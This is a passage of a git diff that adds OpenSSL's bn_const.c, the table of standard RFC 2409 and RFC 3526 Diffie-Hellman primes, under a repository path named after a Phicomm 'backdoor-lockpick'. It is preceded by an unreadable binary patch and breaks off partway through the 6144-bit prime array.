zXTYYEH|(4k#*tJeofnzGJdI_HbZ#|MXkyGv*F<1VkHc6sXe=vdYAic_v|hKp{`l>V
zg4^LP_<fGw+#q;gpg8#>HeSQK8t`$>;a+EFPWU$^eLNq6pOiT6O~HR5@r@FHuL1wC
z0lzKrO_HAta4t}AzIVV+jJsFjay;)y96pFw^sh<$D-yrefN#abfH?CUl(;<K{Sw~>
zb|TJMiQg;nqQnCdKP_>2US}kJpQL|H;`d8jT*=P7Mfv*(x$M6rar}N0@&8=nZ4$rG
zfVZJz5U2m05`O^th5sic{-DH7iOb{a=o|#Q@s1LHI;C}#^#h=Tf@$KZV(m`$T;<|^
z7W-f5i~Dolp)c;qR~=m3lV==U+>`G*xVR@ja&U1^{?oz5J?Y`|6>*AtvfshQy)@(C
z;$AxA;Nt!vq5RQFGd&8WnX}77qLwo<>5ys6m?Q-6xHJik=JO<!%VGo7!=W$<jb$e%
z@umn(WlbXle<8N#&Ggt2-kzAULeshIG+Z1<!4w@Dhv1e<Pa1r}|7Q^Zdz_l{i?0h9
z$|=6T?AFTXyl9dwP(zij6=GLjwm&e5#`izIlW-jIh3e<}4{^@bI3?sG$GD<{FN0{3
zuR#rc{;&37utlHZUVthSF+RpEix^*&UC@d34p|B6*LeI7JGihDC7x4JmsK}5%dOSA
zQ};>e!hZwunMG|sw+~=L5|Mv_o`MScblOL_ec3Uf(>?>X_16CiUMe6FZjX7yZ&qP1
z*1z7^Xm^uu$e;3s#qESXoc8F`x%Pm_s~hl1$PGvQjwXAz*R%KIOCMy`E>@mS`~L#|
C2r3l-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_const.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_const.c
new file mode 100644
index 0000000..12c3208
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_const.c
@@ -0,0 +1,547 @@
+/* crypto/bn/knownprimes.c */
+/* Insert boilerplate */
+
+#include "bn.h"
+
+/*-
+ * "First Oakley Default Group" from RFC2409, section 6.1.
+ *
+ * The prime is: 2^768 - 2 ^704 - 1 + 2^64 * { [2^638 pi] + 149686 }
+ *
+ * RFC2409 specifies a generator of 2.
+ * RFC2412 specifies a generator of of 22.
+ */
+
+BIGNUM *get_rfc2409_prime_768(BIGNUM *bn)
+{
+    static const unsigned char RFC2409_PRIME_768[] = {
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
+        0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
+        0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
+        0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
+        0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
+        0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
+        0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
+        0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
+        0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
+        0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x3A, 0x36, 0x20,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    };
+    return BN_bin2bn(RFC2409_PRIME_768, sizeof(RFC2409_PRIME_768), bn);
+}
+
+/*-
+ * "Second Oakley Default Group" from RFC2409, section 6.2.
+ *
+ * The prime is: 2^1024 - 2^960 - 1 + 2^64 * { [2^894 pi] + 129093 }.
+ *
+ * RFC2409 specifies a generator of 2.
+ * RFC2412 specifies a generator of 22.
+ */
+
+BIGNUM *get_rfc2409_prime_1024(BIGNUM *bn)
+{
+    static const unsigned char RFC2409_PRIME_1024[] = {
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
+        0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
+        0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
+        0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
+        0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
+        0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
+        0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
+        0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
+        0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
+        0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
+        0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
+        0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
+        0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
+        0x49, 0x28, 0x66, 0x51, 0xEC, 0xE6, 0x53, 0x81,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    };
+    return BN_bin2bn(RFC2409_PRIME_1024, sizeof(RFC2409_PRIME_1024), bn);
+}
+
+/*-
+ * "1536-bit MODP Group" from RFC3526, Section 2.
+ *
+ * The prime is: 2^1536 - 2^1472 - 1 + 2^64 * { [2^1406 pi] + 741804 }
+ *
+ * RFC3526 specifies a generator of 2.
+ * RFC2312 specifies a generator of 22.
+ */
+
+BIGNUM *get_rfc3526_prime_1536(BIGNUM *bn)
+{
+    static const unsigned char RFC3526_PRIME_1536[] = {
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
+        0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
+        0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
+        0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
+        0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
+        0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
+        0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
+        0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
+        0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
+        0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
+        0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
+        0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
+        0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
+        0x49, 0x28, 0x66, 0x51, 0xEC, 0xE4, 0x5B, 0x3D,
+        0xC2, 0x00, 0x7C, 0xB8, 0xA1, 0x63, 0xBF, 0x05,
+        0x98, 0xDA, 0x48, 0x36, 0x1C, 0x55, 0xD3, 0x9A,
+        0x69, 0x16, 0x3F, 0xA8, 0xFD, 0x24, 0xCF, 0x5F,
+        0x83, 0x65, 0x5D, 0x23, 0xDC, 0xA3, 0xAD, 0x96,
+        0x1C, 0x62, 0xF3, 0x56, 0x20, 0x85, 0x52, 0xBB,
+        0x9E, 0xD5, 0x29, 0x07, 0x70, 0x96, 0x96, 0x6D,
+        0x67, 0x0C, 0x35, 0x4E, 0x4A, 0xBC, 0x98, 0x04,
+        0xF1, 0x74, 0x6C, 0x08, 0xCA, 0x23, 0x73, 0x27,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    };
+    return BN_bin2bn(RFC3526_PRIME_1536, sizeof(RFC3526_PRIME_1536), bn);
+}
+
+/*-
+ * "2048-bit MODP Group" from RFC3526, Section 3.
+ *
+ * The prime is: 2^2048 - 2^1984 - 1 + 2^64 * { [2^1918 pi] + 124476 }
+ *
+ * RFC3526 specifies a generator of 2.
+ */
+
+BIGNUM *get_rfc3526_prime_2048(BIGNUM *bn)
+{
+    static const unsigned char RFC3526_PRIME_2048[] = {
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
+        0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
+        0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
+        0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
+        0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
+        0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
+        0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
+        0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
+        0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
+        0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
+        0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
+        0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
+        0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
+        0x49, 0x28, 0x66, 0x51, 0xEC, 0xE4, 0x5B, 0x3D,
+        0xC2, 0x00, 0x7C, 0xB8, 0xA1, 0x63, 0xBF, 0x05,
+        0x98, 0xDA, 0x48, 0x36, 0x1C, 0x55, 0xD3, 0x9A,
+        0x69, 0x16, 0x3F, 0xA8, 0xFD, 0x24, 0xCF, 0x5F,
+        0x83, 0x65, 0x5D, 0x23, 0xDC, 0xA3, 0xAD, 0x96,
+        0x1C, 0x62, 0xF3, 0x56, 0x20, 0x85, 0x52, 0xBB,
+        0x9E, 0xD5, 0x29, 0x07, 0x70, 0x96, 0x96, 0x6D,
+        0x67, 0x0C, 0x35, 0x4E, 0x4A, 0xBC, 0x98, 0x04,
+        0xF1, 0x74, 0x6C, 0x08, 0xCA, 0x18, 0x21, 0x7C,
+        0x32, 0x90, 0x5E, 0x46, 0x2E, 0x36, 0xCE, 0x3B,
+        0xE3, 0x9E, 0x77, 0x2C, 0x18, 0x0E, 0x86, 0x03,
+        0x9B, 0x27, 0x83, 0xA2, 0xEC, 0x07, 0xA2, 0x8F,
+        0xB5, 0xC5, 0x5D, 0xF0, 0x6F, 0x4C, 0x52, 0xC9,
+        0xDE, 0x2B, 0xCB, 0xF6, 0x95, 0x58, 0x17, 0x18,
+        0x39, 0x95, 0x49, 0x7C, 0xEA, 0x95, 0x6A, 0xE5,
+        0x15, 0xD2, 0x26, 0x18, 0x98, 0xFA, 0x05, 0x10,
+        0x15, 0x72, 0x8E, 0x5A, 0x8A, 0xAC, 0xAA, 0x68,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    };
+    return BN_bin2bn(RFC3526_PRIME_2048, sizeof(RFC3526_PRIME_2048), bn);
+}
+
+/*-
+ * "3072-bit MODP Group" from RFC3526, Section 4.
+ *
+ * The prime is: 2^3072 - 2^3008 - 1 + 2^64 * { [2^2942 pi] + 1690314 }
+ *
+ * RFC3526 specifies a generator of 2.
+ */
+
+BIGNUM *get_rfc3526_prime_3072(BIGNUM *bn)
+{
+    static const unsigned char RFC3526_PRIME_3072[] = {
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
+        0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
+        0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
+        0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
+        0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
+        0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
+        0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
+        0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
+        0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
+        0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
+        0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
+        0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
+        0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
+        0x49, 0x28, 0x66, 0x51, 0xEC, 0xE4, 0x5B, 0x3D,
+        0xC2, 0x00, 0x7C, 0xB8, 0xA1, 0x63, 0xBF, 0x05,
+        0x98, 0xDA, 0x48, 0x36, 0x1C, 0x55, 0xD3, 0x9A,
+        0x69, 0x16, 0x3F, 0xA8, 0xFD, 0x24, 0xCF, 0x5F,
+        0x83, 0x65, 0x5D, 0x23, 0xDC, 0xA3, 0xAD, 0x96,
+        0x1C, 0x62, 0xF3, 0x56, 0x20, 0x85, 0x52, 0xBB,
+        0x9E, 0xD5, 0x29, 0x07, 0x70, 0x96, 0x96, 0x6D,
+        0x67, 0x0C, 0x35, 0x4E, 0x4A, 0xBC, 0x98, 0x04,
+        0xF1, 0x74, 0x6C, 0x08, 0xCA, 0x18, 0x21, 0x7C,
+        0x32, 0x90, 0x5E, 0x46, 0x2E, 0x36, 0xCE, 0x3B,
+        0xE3, 0x9E, 0x77, 0x2C, 0x18, 0x0E, 0x86, 0x03,
+        0x9B, 0x27, 0x83, 0xA2, 0xEC, 0x07, 0xA2, 0x8F,
+        0xB5, 0xC5, 0x5D, 0xF0, 0x6F, 0x4C, 0x52, 0xC9,
+        0xDE, 0x2B, 0xCB, 0xF6, 0x95, 0x58, 0x17, 0x18,
+        0x39, 0x95, 0x49, 0x7C, 0xEA, 0x95, 0x6A, 0xE5,
+        0x15, 0xD2, 0x26, 0x18, 0x98, 0xFA, 0x05, 0x10,
+        0x15, 0x72, 0x8E, 0x5A, 0x8A, 0xAA, 0xC4, 0x2D,
+        0xAD, 0x33, 0x17, 0x0D, 0x04, 0x50, 0x7A, 0x33,
+        0xA8, 0x55, 0x21, 0xAB, 0xDF, 0x1C, 0xBA, 0x64,
+        0xEC, 0xFB, 0x85, 0x04, 0x58, 0xDB, 0xEF, 0x0A,
+        0x8A, 0xEA, 0x71, 0x57, 0x5D, 0x06, 0x0C, 0x7D,
+        0xB3, 0x97, 0x0F, 0x85, 0xA6, 0xE1, 0xE4, 0xC7,
+        0xAB, 0xF5, 0xAE, 0x8C, 0xDB, 0x09, 0x33, 0xD7,
+        0x1E, 0x8C, 0x94, 0xE0, 0x4A, 0x25, 0x61, 0x9D,
+        0xCE, 0xE3, 0xD2, 0x26, 0x1A, 0xD2, 0xEE, 0x6B,
+        0xF1, 0x2F, 0xFA, 0x06, 0xD9, 0x8A, 0x08, 0x64,
+        0xD8, 0x76, 0x02, 0x73, 0x3E, 0xC8, 0x6A, 0x64,
+        0x52, 0x1F, 0x2B, 0x18, 0x17, 0x7B, 0x20, 0x0C,
+        0xBB, 0xE1, 0x17, 0x57, 0x7A, 0x61, 0x5D, 0x6C,
+        0x77, 0x09, 0x88, 0xC0, 0xBA, 0xD9, 0x46, 0xE2,
+        0x08, 0xE2, 0x4F, 0xA0, 0x74, 0xE5, 0xAB, 0x31,
+        0x43, 0xDB, 0x5B, 0xFC, 0xE0, 0xFD, 0x10, 0x8E,
+        0x4B, 0x82, 0xD1, 0x20, 0xA9, 0x3A, 0xD2, 0xCA,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    };
+    return BN_bin2bn(RFC3526_PRIME_3072, sizeof(RFC3526_PRIME_3072), bn);
+}
+
+/*-
+ * "4096-bit MODP Group" from RFC3526, Section 5.
+ *
+ * The prime is: 2^4096 - 2^4032 - 1 + 2^64 * { [2^3966 pi] + 240904 }
+ *
+ * RFC3526 specifies a generator of 2.
+ */
+
+BIGNUM *get_rfc3526_prime_4096(BIGNUM *bn)
+{
+    static const unsigned char RFC3526_PRIME_4096[] = {
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
+        0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
+        0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
+        0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
+        0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
+        0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
+        0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
+        0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
+        0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
+        0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
+        0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
+        0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
+        0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
+        0x49, 0x28, 0x66, 0x51, 0xEC, 0xE4, 0x5B, 0x3D,
+        0xC2, 0x00, 0x7C, 0xB8, 0xA1, 0x63, 0xBF, 0x05,
+        0x98, 0xDA, 0x48, 0x36, 0x1C, 0x55, 0xD3, 0x9A,
+        0x69, 0x16, 0x3F, 0xA8, 0xFD, 0x24, 0xCF, 0x5F,
+        0x83, 0x65, 0x5D, 0x23, 0xDC, 0xA3, 0xAD, 0x96,
+        0x1C, 0x62, 0xF3, 0x56, 0x20, 0x85, 0x52, 0xBB,
+        0x9E, 0xD5, 0x29, 0x07, 0x70, 0x96, 0x96, 0x6D,
+        0x67, 0x0C, 0x35, 0x4E, 0x4A, 0xBC, 0x98, 0x04,
+        0xF1, 0x74, 0x6C, 0x08, 0xCA, 0x18, 0x21, 0x7C,
+        0x32, 0x90, 0x5E, 0x46, 0x2E, 0x36, 0xCE, 0x3B,
+        0xE3, 0x9E, 0x77, 0x2C, 0x18, 0x0E, 0x86, 0x03,
+        0x9B, 0x27, 0x83, 0xA2, 0xEC, 0x07, 0xA2, 0x8F,
+        0xB5, 0xC5, 0x5D, 0xF0, 0x6F, 0x4C, 0x52, 0xC9,
+        0xDE, 0x2B, 0xCB, 0xF6, 0x95, 0x58, 0x17, 0x18,
+        0x39, 0x95, 0x49, 0x7C, 0xEA, 0x95, 0x6A, 0xE5,
+        0x15, 0xD2, 0x26, 0x18, 0x98, 0xFA, 0x05, 0x10,
+        0x15, 0x72, 0x8E, 0x5A, 0x8A, 0xAA, 0xC4, 0x2D,
+        0xAD, 0x33, 0x17, 0x0D, 0x04, 0x50, 0x7A, 0x33,
+        0xA8, 0x55, 0x21, 0xAB, 0xDF, 0x1C, 0xBA, 0x64,
+        0xEC, 0xFB, 0x85, 0x04, 0x58, 0xDB, 0xEF, 0x0A,
+        0x8A, 0xEA, 0x71, 0x57, 0x5D, 0x06, 0x0C, 0x7D,
+        0xB3, 0x97, 0x0F, 0x85, 0xA6, 0xE1, 0xE4, 0xC7,
+        0xAB, 0xF5, 0xAE, 0x8C, 0xDB, 0x09, 0x33, 0xD7,
+        0x1E, 0x8C, 0x94, 0xE0, 0x4A, 0x25, 0x61, 0x9D,
+        0xCE, 0xE3, 0xD2, 0x26, 0x1A, 0xD2, 0xEE, 0x6B,
+        0xF1, 0x2F, 0xFA, 0x06, 0xD9, 0x8A, 0x08, 0x64,
+        0xD8, 0x76, 0x02, 0x73, 0x3E, 0xC8, 0x6A, 0x64,
+        0x52, 0x1F, 0x2B, 0x18, 0x17, 0x7B, 0x20, 0x0C,
+        0xBB, 0xE1, 0x17, 0x57, 0x7A, 0x61, 0x5D, 0x6C,
+        0x77, 0x09, 0x88, 0xC0, 0xBA, 0xD9, 0x46, 0xE2,
+        0x08, 0xE2, 0x4F, 0xA0, 0x74, 0xE5, 0xAB, 0x31,
+        0x43, 0xDB, 0x5B, 0xFC, 0xE0, 0xFD, 0x10, 0x8E,
+        0x4B, 0x82, 0xD1, 0x20, 0xA9, 0x21, 0x08, 0x01,
+        0x1A, 0x72, 0x3C, 0x12, 0xA7, 0x87, 0xE6, 0xD7,
+        0x88, 0x71, 0x9A, 0x10, 0xBD, 0xBA, 0x5B, 0x26,
+        0x99, 0xC3, 0x27, 0x18, 0x6A, 0xF4, 0xE2, 0x3C,
+        0x1A, 0x94, 0x68, 0x34, 0xB6, 0x15, 0x0B, 0xDA,
+        0x25, 0x83, 0xE9, 0xCA, 0x2A, 0xD4, 0x4C, 0xE8,
+        0xDB, 0xBB, 0xC2, 0xDB, 0x04, 0xDE, 0x8E, 0xF9,
+        0x2E, 0x8E, 0xFC, 0x14, 0x1F, 0xBE, 0xCA, 0xA6,
+        0x28, 0x7C, 0x59, 0x47, 0x4E, 0x6B, 0xC0, 0x5D,
+        0x99, 0xB2, 0x96, 0x4F, 0xA0, 0x90, 0xC3, 0xA2,
+        0x23, 0x3B, 0xA1, 0x86, 0x51, 0x5B, 0xE7, 0xED,
+        0x1F, 0x61, 0x29, 0x70, 0xCE, 0xE2, 0xD7, 0xAF,
+        0xB8, 0x1B, 0xDD, 0x76, 0x21, 0x70, 0x48, 0x1C,
+        0xD0, 0x06, 0x91, 0x27, 0xD5, 0xB0, 0x5A, 0xA9,
+        0x93, 0xB4, 0xEA, 0x98, 0x8D, 0x8F, 0xDD, 0xC1,
+        0x86, 0xFF, 0xB7, 0xDC, 0x90, 0xA6, 0xC0, 0x8F,
+        0x4D, 0xF4, 0x35, 0xC9, 0x34, 0x06, 0x31, 0x99,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    };
+    return BN_bin2bn(RFC3526_PRIME_4096, sizeof(RFC3526_PRIME_4096), bn);
+}
+
+/*-
+ * "6144-bit MODP Group" from RFC3526, Section 6.
+ *
+ * The prime is: 2^6144 - 2^6080 - 1 + 2^64 * { [2^6014 pi] + 929484 }
+ *
+ * RFC3526 specifies a generator of 2.
+ */
+
+BIGNUM *get_rfc3526_prime_6144(BIGNUM *bn)
+{
+    static const unsigned char RFC3526_PRIME_6144[] = {
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
+        0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
+        0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
+        0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
+        0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
+        0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
+        0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
+        0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
+        0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
+        0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
+        0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
+        0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
+        0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
+        0x49, 0x28, 0x66, 0x51, 0xEC, 0xE4, 0x5B, 0x3D,
+        0xC2, 0x00, 0x7C, 0xB8, 0xA1, 0x63, 0xBF, 0x05,
+        0x98, 0xDA, 0x48, 0x36, 0x1C, 0x55, 0xD3, 0x9A,
+        0x69, 0x16, 0x3F, 0xA8, 0xFD, 0x24, 0xCF, 0x5F,
+        0x83, 0x65, 0x5D, 0x23, 0xDC, 0xA3, 0xAD, 0x96,
+        0x1C, 0x62, 0xF3, 0x56, 0x20, 0x85, 0x52, 0xBB,
+        0x9E, 0xD5, 0x29, 0x07, 0x70, 0x96, 0x96, 0x6D,
+        0x67, 0x0C, 0x35, 0x4E, 0x4A, 0xBC, 0x98, 0x04,
+        0xF1, 0x74, 0x6C, 0x08, 0xCA, 0x18, 0x21, 0x7C,
+        0x32, 0x90, 0x5E, 0x46, 0x2E, 0x36, 0xCE, 0x3B,
+        0xE3, 0x9E, 0x77, 0x2C, 0x18, 0x0E, 0x86, 0x03,
+        0x9B, 0x27, 0x83, 0xA2, 0xEC, 0x07, 0xA2, 0x8F,
+        0xB5, 0xC5, 0x5D, 0xF0, 0x6F, 0x4C, 0x52, 0xC9,
+        0xDE, 0x2B, 0xCB, 0xF6, 0x95, 0x58, 0x17, 0x18,
+        0x39, 0x95, 0x49, 0x7C, 0xEA, 0x95, 0x6A, 0xE5,
+        0x15, 0xD2, 0x26, 0x18, 0x98, 0xFA, 0x05, 0x10,
+        0x15, 0x72, 0x8E, 0x5A, 0x8A, 0xAA, 0xC4, 0x2D,
+        0xAD, 0x33, 0x17, 0x0D, 0x04, 0x50, 0x7A, 0x33,
+        0xA8, 0x55, 0x21, 0xAB, 0xDF, 0x1C, 0xBA, 0x64,
+        0xEC, 0xFB, 0x85, 0x04, 0x58, 0xDB, 0xEF, 0x0A,
+        0x8A, 0xEA, 0x71, 0x57, 0x5D, 0x06, 0x0C, 0x7D,
+        0xB3, 0x97, 0x0F, 0x85, 0xA6, 0xE1, 0xE4, 0xC7,
+        0xAB, 0xF5, 0xAE, 0x8C, 0xDB, 0x09, 0x33, 0xD7,
+        0x1E, 0x8C, 0x94, 0xE0, 0x4A, 0x25, 0x61, 0x9D,
+        0xCE, 0xE3, 0xD2, 0x26, 0x1A, 0xD2, 0xEE, 0x6B,
+        0xF1, 0x2F, 0xFA, 0x06, 0xD9, 0x8A, 0x08, 0x64,
+        0xD8, 0x76, 0x02, 0x73, 0x3E, 0xC8, 0x6A, 0x64,
+        0x52, 0x1F, 0x2B, 0x18, 0x17, 0x7B, 0x20, 0x0C,
+        0xBB, 0xE1, 0x17, 0x57, 0x7A, 0x61, 0x5D, 0x6C,
+        0x77, 0x09, 0x88, 0xC0, 0xBA, 0xD9, 0x46, 0xE2,
+        0x08, 0xE2, 0x4F, 0xA0, 0x74, 0xE5, 0xAB, 0x31,
+        0x43, 0xDB, 0x5B, 0xFC, 0xE0, 0xFD, 0x10, 0x8E,
+        0x4B, 0x82, 0xD1, 0x20, 0xA9, 0x21, 0x08, 0x01,
+        0x1A, 0x72, 0x3C, 0x12, 0xA7, 0x87, 0xE6, 0xD7,
+        0x88, 0x71, 0x9A, 0x10, 0xBD, 0xBA, 0x5B, 0x26,
+        0x99, 0xC3, 0x27, 0x18, 0x6A, 0xF4, 0xE2, 0x3C,
+        0x1A, 0x94, 0x68, 0x34, 0xB6, 0x15, 0x0B, 0xDA,
+        0x25, 0x83, 0xE9, 0xCA, 0x2A, 0xD4, 0x4C, 0xE8,
+        0xDB, 0xBB, 0xC2, 0xDB, 0x04, 0xDE, 0x8E, 0xF9,
+        0x2E, 0x8E, 0xFC, 0x14, 0x1F, 0xBE, 0xCA, 0xA6,
+        0x28, 0x7C, 0x59, 0x47, 0x4E, 0x6B, 0xC0, 0x5D,
+        0x99, 0xB2, 0x96, 0x4F, 0xA0, 0x90, 0xC3, 0xA2,
+        0x23, 0x3B, 0xA1, 0x86, 0x51, 0x5B, 0xE7, 0xED,
+        0x1F, 0x61, 0x29, 0x70, 0xCE, 0xE2, 0xD7, 0xAF,
+        0xB8, 0x1B, 0xDD, 0x76, 0x21, 0x70, 0x48, 0x1C,
+        0xD0, 0x06, 0x91, 0x27, 0xD5, 0xB0, 0x5A, 0xA9,
+        0x93, 0xB4, 0xEA, 0x98, 0x8D, 0x8F, 0xDD, 0xC1,
+        0x86, 0xFF, 0xB7, 0xDC, 0x90, 0xA6, 0xC0, 0x8F,
+        0x4D, 0xF4, 0x35, 0xC9, 0x34, 0x02, 0x84, 0x92,
+        0x36, 0xC3, 0xFA, 0xB4, 0xD2, 0x7C, 0x70, 0x26,
+        0xC1, 0xD4, 0xDC, 0xB2, 0x60, 0x26, 0x46, 0xDE,
+        0xC9, 0x75, 0x1E, 0x76, 0x3D, 0xBA, 0x37, 0xBD,
